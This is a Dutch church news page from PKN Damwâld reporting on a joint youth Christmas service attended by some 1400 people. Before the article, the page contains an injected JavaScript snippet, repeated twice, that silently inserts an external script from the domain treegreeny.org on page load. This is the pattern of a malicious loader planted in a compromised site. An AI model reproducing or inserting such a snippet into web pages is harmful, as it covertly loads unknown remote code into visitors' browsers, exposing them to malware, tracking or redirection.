;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ruim 1400 bezoekers bij Younited kerstjeugddienst - PKN Damwâld

Ruim 1400 bezoekers bij Younited kerstjeugddienst

Gepubliceerd op: maandag 17 december 2018

“Wie wat bewaart, die heeft wat”. Met die woorden sloot één van de drie voorgangers zondagavond de gezamenlijke kerstdienst in sporthal de Boppeslach in Damwâld af. De zaal was tot de nok toe gevuld met 1400 bezoekers van alle leeftijden uit de wijde omtrek. De kerstspecial werd voor het eerst gezamenlijk georganiseerd door drie kerken uit Broeksterwâld, Damwâld en Driezum-Wâlterswâld.

Het thema van de dienst was: ‘KERST: als alle lichten zijn gedoofd’. Natuurlijk kwamen klassieke liederen als ‘Stille nacht’ en ‘Ere zij God’ voorbij, onder begeleiding van gospelband Sign. En werd het aloude kerstverhaal uitgebeeld door spelers van alle kerken. De engelen, de herders, de wijzen en natuurlijk Jozef, Maria en hun kindeke Jezus, ze waren allemaal van de partij met de nodige humor. “Wat in binde hjir”, zei één van de wijzen van de stal op het grote podium midden in de zaal.

Aan de drie voorgangers de schone taak om alle opsmuk van het verhaal te halen. Zo vertelde Robert Colijn (PKN Damwâld) over de herders en dat zij in die tijd eigenlijk het uitschot van de maatschappij waren. De wijzen geloofden helemaal niet in God, waarschijnlijk ook niet na hun ontmoeting met de Messias, legde Alfons van Vliet (GK Broeksterwâld) uit. En toch waren het deze beide groepen die als eerste op bezoek gingen bij het Koningskind. Volgens Leo Blees (GK Driezum-Wâlterswâld) was het helemaal niet zo romantisch voor Jozef en Maria. Een piepjong meisje in verwachting en niet van haar man Jozef. Het was eigenlijk een zootje…. Maar met kerst draait het allemaal om hun ‘Zoontje’, en niet om het zootje of de veelal commerciële opsmuk van tegenwoordig. En dat werd deze avond alvast groots gevierd door alle aanwezigen.

Het initiatief voor de interkerkelijke dienst kwam van de jeugddienstcommissie Younited van de PKN Gereformeerd/Hervormde kerk te Damwâld. Younited-voorzitter Pier Reitsma kijkt zeer tevreden terug. “Prachtich! It is sa klisjee om te sizzen dat it in grut sukses wie mei safolle besikers. Mar dat wie it foar ús wol. We ha hjir in jier nei ta wurke en ast dan sjochst dat we dit mei trije tsjerken delsette kin, dan is dat toch wol bysûnder.” De dienst, waar tientallen vrijwilligers aan meewerkten, werd afgesloten met het lied ‘Als alle lichten zijn gedoofd’ van Marco Borsato. Over een week barst overal het kerstfeest weer los.